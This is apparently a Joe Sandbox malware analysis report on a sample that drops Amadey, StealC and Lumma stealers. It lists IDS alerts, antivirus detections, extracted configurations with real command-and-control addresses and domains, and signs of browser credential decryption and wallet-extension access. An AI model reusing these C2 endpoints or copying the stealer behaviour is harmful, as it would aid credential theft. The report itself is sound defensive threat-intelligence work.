2024-12-14T23:59:09.576175+0100	2803304	3	Unknown Traffic	192.168.2.4	49921	185.215.113.206	80	TCP
2024-12-14T23:59:13.433508+0100	2803304	3	Unknown Traffic	192.168.2.4	49921	185.215.113.206	80	TCP
2024-12-14T23:59:14.759625+0100	2803304	3	Unknown Traffic	192.168.2.4	49921	185.215.113.206	80	TCP
2024-12-14T23:59:21.644724+0100	2803304	3	Unknown Traffic	192.168.2.4	50001	185.215.113.16	80	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:27.370033+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49812	104.102.49.254	443	TCP
2024-12-14T23:58:45.806518+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49862	104.102.49.254	443	TCP
2024-12-14T23:58:59.066733+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49923	104.102.49.254	443	TCP
2024-12-14T23:59:26.491191+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	50017	104.102.49.254	443	TCP
2024-12-14T23:59:47.621233+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	50113	104.102.49.254	443	TCP
2024-12-15T00:04:04.770008+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	50288	104.102.49.254	443	TCP
2024-12-15T00:04:20.054282+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	50302	104.102.49.254	443	TCP
2024-12-15T00:04:54.697439+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	50322	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://diffuculttan.xyz/api	Avira URL Cloud: Label: phishing
Source: https://effecterectz.xyz/apif	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/apiK	Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/osc	Avira URL Cloud: Label: malware
Source: https://effecterectz.xyz/apiK	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/9	Avira URL Cloud: Label: malware
Source: https://awake-weaves.cyou:443/api	Avira URL Cloud: Label: malware
Source: https://debonairnukk.xyz/api/p8	Avira URL Cloud: Label: phishing
Source: https://diffuculttan.xyz:443/api	Avira URL Cloud: Label: phishing
Source: https://effecterectz.xyz/x	Avira URL Cloud: Label: malware
Source: https://diffuculttan.xyz/api.0	Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/Cz	Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/apiyc	Avira URL Cloud: Label: malware
Source: https://debonairnukk.xyz/api	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ZiYbk6W[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\H9TU4oY[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen

Found malware configuration

Source: 00000006.00000003.2324887817.0000000005260000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000022.00000002.3250023944.000000000172B000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: c1ca3b12e5.exe.940.15.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["debonairnukk.xyz", "effecterectz.xyz", "tacitglibbr.biz", "awake-weaves.cyou", "immureprech.biz", "deafeninggeh.biz", "diffuculttan.xyz", "sordid-snaked.cyou", "wrathful-jammy.cyou"], "Build id": "PsFKDg--pablo"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ZiYbk6W[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\H9TU4oY[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3F6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	14_2_6D3F6C80
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D54A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	14_2_6D54A9A0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5925B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	14_2_6D5925B0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D544440 PK11_PrivDecrypt,	14_2_6D544440
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D514420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	14_2_6D514420
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5444C0 PK11_PubEncrypt,	14_2_6D5444C0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D56A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	14_2_6D56A730
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D54A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	14_2_6D54A650
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D528670 PK11_ExportEncryptedPrivKeyInfo,	14_2_6D528670
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D52E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	14_2_6D52E6E0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D570180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	14_2_6D570180
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5443B0 PK11_PubEncryptPKCS1,PR_SetError,	14_2_6D5443B0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D527D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	14_2_6D527D60
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D56BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	14_2_6D56BD30
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D567C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	14_2_6D567C00
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D543FF0 PK11_PrivDecryptPKCS1,	14_2_6D543FF0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.51.88:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49907 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.12.241:443 -> 192.168.2.4:50025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.51.88:443 -> 192.168.2.4:50065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:50077 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.193.91:443 -> 192.168.2.4:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50118 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50150 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50151 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50224 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:50279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.4:50283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50284 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50288 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:50295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.4:50297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:50316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.4:50318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50356 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50358 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50357 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50359 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: 232a1df2aa.exe, 0000000E.00000002.3244758201.000000006D45D000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: nss3.pdb@ source: 232a1df2aa.exe, 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: nss3.pdb source: 232a1df2aa.exe, 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: mozglue.pdb source: 232a1df2aa.exe, 0000000E.00000002.3244758201.000000006D45D000.00000002.00000001.01000000.0000001D.sdmp

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: chrome.exe	Memory has grown: Private usage: 1MB later: 41MB
Source: firefox.exe	Memory has grown: Private usage: 40MB later: 219MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49758 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49764
Source: Network traffic	Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.4:51297 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49786 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.4:49794 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.4:63330 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:64201 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:50054 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:61711 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.4:49800 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:62953 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:58198 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:54192 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49811 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058230 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz) : 192.168.2.4:50952 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 87.120.127.228:7777 -> 192.168.2.4:49824
Source: Network traffic	Suricata IDS: 2052265 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 87.120.127.228:7777 -> 192.168.2.4:49824
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49842 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49835 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.4:49848 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:55133 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:56804 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:53913 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49861 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:53689 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.4:49854 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:63719 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:55911 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49855 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49855 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49855
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49855 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49855
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49855 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49880 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49879 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.4:49896 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.4:49907 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:61251 -> 1.1.1.1:53
